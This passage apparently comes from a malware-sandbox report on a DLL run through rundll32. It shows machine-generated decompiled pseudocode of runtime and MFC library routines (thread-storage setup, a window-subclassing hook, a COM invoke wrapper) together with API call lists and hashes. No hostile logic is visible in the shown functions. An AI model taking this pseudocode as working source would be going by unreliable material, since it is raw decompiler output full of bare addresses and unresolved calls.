                                                                                                                      					 *0x10057940 = _t7;
                                                                                                                      					if( *0x10057934 == 0) {
                                                                                                                      						L6:
                                                                                                                      						 *0x10057938 = TlsGetValue;
                                                                                                                      						 *0x10057934 = E10035111;
                                                                                                                      						 *0x1005793c = _t41;
                                                                                                                      						 *0x10057940 = TlsFree;
                                                                                                                      					} else {
                                                                                                                      						__eflags =  *0x10057938;
                                                                                                                      						if( *0x10057938 == 0) {
                                                                                                                      							goto L6;
                                                                                                                      						} else {
                                                                                                                      							__eflags =  *0x1005793c;
                                                                                                                      							if( *0x1005793c == 0) {
                                                                                                                      								goto L6;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t7;
                                                                                                                      								if(_t7 == 0) {
                                                                                                                      									goto L6;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					_t10 = TlsAlloc();
                                                                                                                      					__eflags = _t10 - 0xffffffff;
                                                                                                                      					 *0x100547c8 = _t10;
                                                                                                                      					if(_t10 == 0xffffffff) {
                                                                                                                      						L15:
                                                                                                                      						_t11 = 0;
                                                                                                                      						__eflags = 0;
                                                                                                                      					} else {
                                                                                                                      						_t12 = TlsSetValue(_t10,  *0x10057938);
                                                                                                                      						__eflags = _t12;
                                                                                                                      						if(_t12 == 0) {
                                                                                                                      							goto L15;
                                                                                                                      						} else {
                                                                                                                      							E100310CD();
                                                                                                                      							 *0x10057934 = E10035042( *0x10057934);
                                                                                                                      							 *0x10057938 = E10035042( *0x10057938);
                                                                                                                      							 *0x1005793c = E10035042( *0x1005793c);
                                                                                                                      							 *0x10057940 = E10035042( *0x10057940);
                                                                                                                      							_t18 = E10035923();
                                                                                                                      							__eflags = _t18;
                                                                                                                      							if(_t18 == 0) {
                                                                                                                      								L14:
                                                                                                                      								E10035178(_t37);
                                                                                                                      								goto L15;
                                                                                                                      							} else {
                                                                                                                      								_push(E10035304);
                                                                                                                      								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
                                                                                                                      								__eflags = _t21 - 0xffffffff;
                                                                                                                      								 *0x100547c4 = _t21;
                                                                                                                      								if(_t21 == 0xffffffff) {
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t43 = E10035840(1, 0x214);
                                                                                                                      									__eflags = _t43;
                                                                                                                      									if(_t43 == 0) {
                                                                                                                      										goto L14;
                                                                                                                      									} else {
                                                                                                                      										_push(_t43);
                                                                                                                      										_push( *0x100547c4);
                                                                                                                      										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
                                                                                                                      										if(__eflags == 0) {
                                                                                                                      											goto L14;
                                                                                                                      										} else {
                                                                                                                      											_push(0);
                                                                                                                      											_push(_t43);
                                                                                                                      											E100351B5(_t30, _t37, _t38, _t43, __eflags);
                                                                                                                      											_t26 = GetCurrentThreadId();
                                                                                                                      											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
                                                                                                                      											 *_t43 = _t26;
                                                                                                                      											_t11 = 1;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t11;
                                                                                                                      				} else {
                                                                                                                      					E10035178(_t37);
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      			}


















                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                      • __mtterm.LIBCMT ref: 100354A0
                                                                                                                        • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                        • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                      • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                      • __init_pointers.LIBCMT ref: 10035552
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                      • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4287529916-3819984048
                                                                                                                      • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                      • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                      				intOrPtr _t54;
                                                                                                                      				void* _t55;
                                                                                                                      				signed int _t56;
                                                                                                                      				void* _t59;
                                                                                                                      				long _t60;
                                                                                                                      				signed int _t64;
                                                                                                                      				void* _t66;
                                                                                                                      				short _t72;
                                                                                                                      				signed int _t74;
                                                                                                                      				signed int _t76;
                                                                                                                      				long _t83;
                                                                                                                      				signed int _t86;
                                                                                                                      				signed short _t87;
                                                                                                                      				signed int _t88;
                                                                                                                      				int _t94;
                                                                                                                      				void* _t107;
                                                                                                                      				long* _t109;
                                                                                                                      				long _t111;
                                                                                                                      				signed int _t112;
                                                                                                                      				CHAR* _t113;
                                                                                                                      				intOrPtr _t114;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t120;
                                                                                                                      				intOrPtr _t121;
                                                                                                                      
                                                                                                                      				_t120 = __eflags;
                                                                                                                      				_t106 = __edi;
                                                                                                                      				_push(0x148);
                                                                                                                      				E10030D90(E1004429C, __ebx, __edi, __esi);
                                                                                                                      				_t111 =  *(_t117 + 0x10);
                                                                                                                      				_t94 =  *(_t117 + 0xc);
                                                                                                                      				_push(E10015B30);
                                                                                                                      				 *(_t117 - 0x120) = _t111;
                                                                                                                      				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
                                                                                                                      				_t121 = _t54;
                                                                                                                      				_t97 = 0 | _t121 == 0x00000000;
                                                                                                                      				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
                                                                                                                      				if(_t121 == 0) {
                                                                                                                      					_t54 = E100201F1(_t97);
                                                                                                                      				}
                                                                                                                      				if( *(_t117 + 8) == 3) {
                                                                                                                      					_t107 =  *_t111;
                                                                                                                      					_t112 =  *(_t54 + 0x14);
                                                                                                                      					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
                                                                                                                      					__eflags = _t112;
                                                                                                                      					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                      					 *(_t117 - 0x124) = _t56;
                                                                                                                      					if(_t112 != 0) {
                                                                                                                      						L7:
                                                                                                                      						__eflags =  *0x10057854;
                                                                                                                      						if( *0x10057854 == 0) {
                                                                                                                      							L12:
                                                                                                                      							__eflags = _t112;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								__eflags =  *0x10057454;
                                                                                                                      								if( *0x10057454 != 0) {
                                                                                                                      									L19:
                                                                                                                      									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										L23:
                                                                                                                      										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                      										__eflags = _t59;
                                                                                                                      										 *(_t117 - 0x14) = _t59;
                                                                                                                      										if(_t59 != 0) {
                                                                                                                      											_t113 = "AfxOldWndProc423";
                                                                                                                      											_t64 = GetPropA(_t94, _t113);
                                                                                                                      											__eflags = _t64;
                                                                                                                      											if(_t64 == 0) {
                                                                                                                      												SetPropA(_t94, _t113,  *(_t117 - 0x14));
                                                                                                                      												_t66 = GetPropA(_t94, _t113);
                                                                                                                      												__eflags = _t66 -  *(_t117 - 0x14);
                                                                                                                      												if(_t66 ==  *(_t117 - 0x14)) {
                                                                                                                      													GlobalAddAtomA(_t113);
                                                                                                                      													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      										L27:
                                                                                                                      										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
                                                                                                                      										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
                                                                                                                      										__eflags =  *(_t117 - 0x124);
                                                                                                                      										_t111 = _t60;
                                                                                                                      										if( *(_t117 - 0x124) != 0) {
                                                                                                                      											UnhookWindowsHookEx( *(_t106 + 0x28));
                                                                                                                      											_t50 = _t106 + 0x28;
                                                                                                                      											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
                                                                                                                      											__eflags =  *_t50;
                                                                                                                      										}
                                                                                                                      										goto L30;
                                                                                                                      									}
                                                                                                                      									goto L27;
                                                                                                                      								}
                                                                                                                      								_t114 = 0x30;
                                                                                                                      								E10030030(_t107, _t117 - 0x154, 0, _t114);
                                                                                                                      								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
                                                                                                                      								_push(_t117 - 0x154);
                                                                                                                      								_push("#32768");
                                                                                                                      								_push(0);
                                                                                                                      								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
                                                                                                                      								__eflags = _t72;
                                                                                                                      								 *0x10057454 = _t72;
                                                                                                                      								if(_t72 == 0) {
                                                                                                                      									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
                                                                                                                      									__eflags = _t74;
                                                                                                                      									if(_t74 == 0) {
                                                                                                                      										goto L23;
                                                                                                                      									}
                                                                                                                      									 *((char*)(_t117 - 0x19)) = 0;
                                                                                                                      									_t76 = E10032D2F(_t117 - 0x118, "#32768");
                                                                                                                      									__eflags = _t76;
                                                                                                                      									if(_t76 == 0) {
                                                                                                                      										goto L27;
                                                                                                                      									}
                                                                                                                      									goto L23;
                                                                                                                      								}
                                                                                                                      								goto L19;
                                                                                                                      							}
                                                                                                                      							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
                                                                                                                      							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
                                                                                                                      							E1001B083(_t112, _t117, _t94);
                                                                                                                      							 *((intOrPtr*)( *_t112 + 0x50))();
                                                                                                                      							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
                                                                                                                      							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
                                                                                                                      							__eflags = _t83 - E1001B780;
                                                                                                                      							if(_t83 != E1001B780) {
                                                                                                                      								 *_t109 = _t83;
                                                                                                                      							}
                                                                                                                      							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                      							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
                                                                                                                      							__eflags =  *(_t117 - 0x14);
                                                                                                                      							if( *(_t117 - 0x14) != 0) {
                                                                                                                      								_push( *(_t117 - 0x18));
                                                                                                                      								_push(0);
                                                                                                                      								E1001F30C();
                                                                                                                      							}
                                                                                                                      							goto L27;
                                                                                                                      						}
                                                                                                                      						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                      						__eflags = _t86 & 0x00010000;
                                                                                                                      						if((_t86 & 0x00010000) != 0) {
                                                                                                                      							goto L27;
                                                                                                                      						}
                                                                                                                      						_t87 =  *(_t107 + 0x28);
                                                                                                                      						__eflags = _t87 - 0xffff;
                                                                                                                      						if(_t87 <= 0xffff) {
                                                                                                                      							 *(_t117 - 0x18) = 0;
                                                                                                                      							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
                                                                                                                      							_t87 = _t117 - 0x18;
                                                                                                                      						}
                                                                                                                      						_t88 = E10014B55(_t87, "ime");
                                                                                                                      						__eflags = _t88;
                                                                                                                      						if(_t88 == 0) {
                                                                                                                      							goto L27;
                                                                                                                      						}
                                                                                                                      						goto L12;
                                                                                                                      					}
                                                                                                                      					__eflags =  *(_t107 + 0x20) & 0x40000000;
                                                                                                                      					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
                                                                                                                      						goto L27;
                                                                                                                      					}
                                                                                                                      					__eflags = _t56;
                                                                                                                      					if(_t56 != 0) {
                                                                                                                      						goto L27;
                                                                                                                      					}
                                                                                                                      					goto L7;
                                                                                                                      				} else {
                                                                                                                      					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
                                                                                                                      					L30:
                                                                                                                      					return E10030E13(_t94, _t106, _t111);
                                                                                                                      				}
                                                                                                                      			}




























                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                        • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                      • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                      • _memset.LIBCMT ref: 1001CA70
                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                      • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                      • API String ID: 867647115-4034971020
                                                                                                                      • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                      • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 46%
                                                                                                                      			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                      				void* _t190;
                                                                                                                      				signed int _t194;
                                                                                                                      				intOrPtr* _t200;
                                                                                                                      				signed int _t203;
                                                                                                                      				signed int _t206;
                                                                                                                      				intOrPtr* _t208;
                                                                                                                      				intOrPtr _t211;
                                                                                                                      				char _t230;
                                                                                                                      				CHAR* _t236;
                                                                                                                      				intOrPtr _t237;
                                                                                                                      				signed short _t240;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				signed int _t250;
                                                                                                                      				signed int* _t257;
                                                                                                                      				signed int _t258;
                                                                                                                      				signed int _t277;
                                                                                                                      				signed short* _t278;
                                                                                                                      				signed short* _t279;
                                                                                                                      				signed int _t290;
                                                                                                                      				signed int _t291;
                                                                                                                      				intOrPtr* _t293;
                                                                                                                      				CHAR* _t295;
                                                                                                                      				intOrPtr* _t296;
                                                                                                                      				intOrPtr _t297;
                                                                                                                      				signed int** _t299;
                                                                                                                      				void* _t300;
                                                                                                                      				void* _t301;
                                                                                                                      				void* _t302;
                                                                                                                      				void* _t313;
                                                                                                                      
                                                                                                                      				_push(0x7c);
                                                                                                                      				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                                                                                      				_t257 = 0;
                                                                                                                      				if( *((intOrPtr*)(__ecx)) == 0) {
                                                                                                                      					L78:
                                                                                                                      					return E10030DFF(_t190);
                                                                                                                      				}
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x54)) = 0;
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                                                                                      				 *(_t300 - 0x4c) = 0;
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                                                                                      				 *(_t300 - 4) = 0;
                                                                                                                      				E10030030(__edi, _t300 - 0x54, 0, 0x10);
                                                                                                                      				_t302 = _t301 + 0xc;
                                                                                                                      				if( *(_t300 + 0x18) != 0) {
                                                                                                                      					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                                                                                      				}
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                                                                                      				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                                                                                      					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                                                                                      					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                                                                                      				}
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                                                                                      				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                                                                                      				_t194 =  *(_t300 - 0x4c);
                                                                                                                      				_t308 = _t194 - _t257;
                                                                                                                      				 *(_t300 - 4) = 1;
                                                                                                                      				_t293 = 4;
                                                                                                                      				if(_t194 == _t257) {
                                                                                                                      					L37:
                                                                                                                      					_t295 = 0;
                                                                                                                      					E1002BDD9(_t300 - 0x44);
                                                                                                                      					if( *(_t300 + 0x10) != _t257) {
                                                                                                                      						_t295 = _t300 - 0x44;
                                                                                                                      					}
                                                                                                                      					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
                                                                                                                      					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                                                                                      					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
                                                                                                                      					_t289 = _t300 - 0x54;
                                                                                                                      					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                                                                                      					E1002DAF2(_t300 - 0x68);
                                                                                                                      					_t203 =  *(_t300 - 0x4c);
                                                                                                                      					if(_t203 == _t257) {
                                                                                                                      						L46:
                                                                                                                      						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                      						E10014517(_t257, _t289, _t293, _t295, _t319);
                                                                                                                      						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                                                                                      						if( *(_t300 + 0xc) >= _t257) {
                                                                                                                      							L61:
                                                                                                                      							_t295 =  *(_t300 + 0x10);
                                                                                                                      							if(_t295 == _t257) {
                                                                                                                      								L76:
                                                                                                                      								 *(_t300 - 4) = 0;
                                                                                                                      								_t190 = E1002CDE9(_t300 - 0x68, _t289);
                                                                                                                      								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                                                                                      								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                      									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
                                                                                                                      								}
                                                                                                                      								goto L78;
                                                                                                                      							}
                                                                                                                      							if(_t295 == 0xc) {
                                                                                                                      								L65:
                                                                                                                      								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                                                                                      								__eflags = _t206 - 0x13;
                                                                                                                      								if(_t206 > 0x13) {
                                                                                                                      									goto L76;
                                                                                                                      								}
                                                                                                                      								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
                                                                                                                      									case 0:
                                                                                                                      										__eax =  *(__ebp + 0x14);
                                                                                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                      										goto L76;
                                                                                                                      									case 1:
                                                                                                                      										__eax =  *(__ebp + 0x14);
                                                                                                                      										__ecx =  *(__ebp - 0x3c);
                                                                                                                      										 *( *(__ebp + 0x14)) = __ecx;
                                                                                                                      										goto L76;
                                                                                                                      									case 2:
                                                                                                                      										__eax =  *(__ebp + 0x14);
                                                                                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                      										goto L76;
                                                                                                                      									case 3:
                                                                                                                      										__eax =  *(__ebp + 0x14);
                                                                                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                      										goto L76;
                                                                                                                      									case 4:
                                                                                                                      										__ecx =  *(__ebp - 0x3c);
                                                                                                                      										__eax =  *(__ebp + 0x14);
                                                                                                                      										 *__eax =  *(__ebp - 0x3c);
                                                                                                                      										__ecx =  *(__ebp - 0x38);
                                                                                                                      										 *(__eax + 4) = __ecx;
                                                                                                                      										goto L76;
                                                                                                                      									case 5:
                                                                                                                      										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                                                                                      										_push( *(__ebp - 0x3c));
                                                                                                                      										__imp__#6();
                                                                                                                      										goto L76;
                                                                                                                      									case 6:
                                                                                                                      										__ecx =  *(__ebp + 0x14);
                                                                                                                      										__eax = 0;
                                                                                                                      										__eflags =  *(__ebp - 0x3c) - __bx;
                                                                                                                      										__eax = 0 | __eflags != 0x00000000;
                                                                                                                      										 *__ecx = __eflags != 0;
                                                                                                                      										goto L76;
                                                                                                                      									case 7:
                                                                                                                      										__edi =  *(__ebp + 0x14);
                                                                                                                      										__esi = __ebp - 0x44;
                                                                                                                      										asm("movsd");
                                                                                                                      										asm("movsd");
                                                                                                                      										asm("movsd");
                                                                                                                      										asm("movsd");
                                                                                                                      										__ebx = 0;
                                                                                                                      										goto L76;
                                                                                                                      									case 8:
                                                                                                                      										goto L76;
                                                                                                                      									case 9:
                                                                                                                      										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                                                                                      										goto L76;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t208 = _t300 - 0x44;
                                                                                                                      							__imp__#12(_t208, _t208, _t257, _t295);
                                                                                                                      							_t293 = _t208;
                                                                                                                      							_t321 = _t293 - _t257;
                                                                                                                      							if(_t293 >= _t257) {
                                                                                                                      								goto L65;
                                                                                                                      							}
                                                                                                                      							__imp__#9(_t300 - 0x44);
                                                                                                                      							_push(_t293);
                                                                                                                      							L49:
                                                                                                                      							E1001FCED(_t257, _t293, _t295, _t321);
                                                                                                                      							L50:
                                                                                                                      							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                                                                                      							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                                                                                      								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                                                                                      							}
                                                                                                                      							_t211 = E100144EC(_t322, 0x20);
                                                                                                                      							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                                                                                      							_t323 = _t211 - _t257;
                                                                                                                      							 *(_t300 - 4) = 4;
                                                                                                                      							if(_t211 != _t257) {
                                                                                                                      								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                                                                                      								_push(_t257);
                                                                                                                      								_push(_t257);
                                                                                                                      								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
                                                                                                                      							}
                                                                                                                      							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                      							_t293 = __imp__#7;
                                                                                                                      							 *(_t300 - 4) = 1;
                                                                                                                      							if( *_t293() != 0) {
                                                                                                                      								_t139 = _t257 + 0x18; // 0x18
                                                                                                                      								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                      							}
                                                                                                                      							_t296 = __imp__#6;
                                                                                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                      							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                      							if( *_t293() != 0) {
                                                                                                                      								_t143 = _t257 + 0xc; // 0xc
                                                                                                                      								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                      							}
                                                                                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                      							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                      							if( *_t293() != 0) {
                                                                                                                      								_t147 = _t257 + 0x14; // 0x14
                                                                                                                      								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                      							}
                                                                                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                      							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                                                                                      							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                                                                                      							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                                                                                      							E10033135(_t300 + 0x14, 0x100505f8);
                                                                                                                      							goto L61;
                                                                                                                      						}
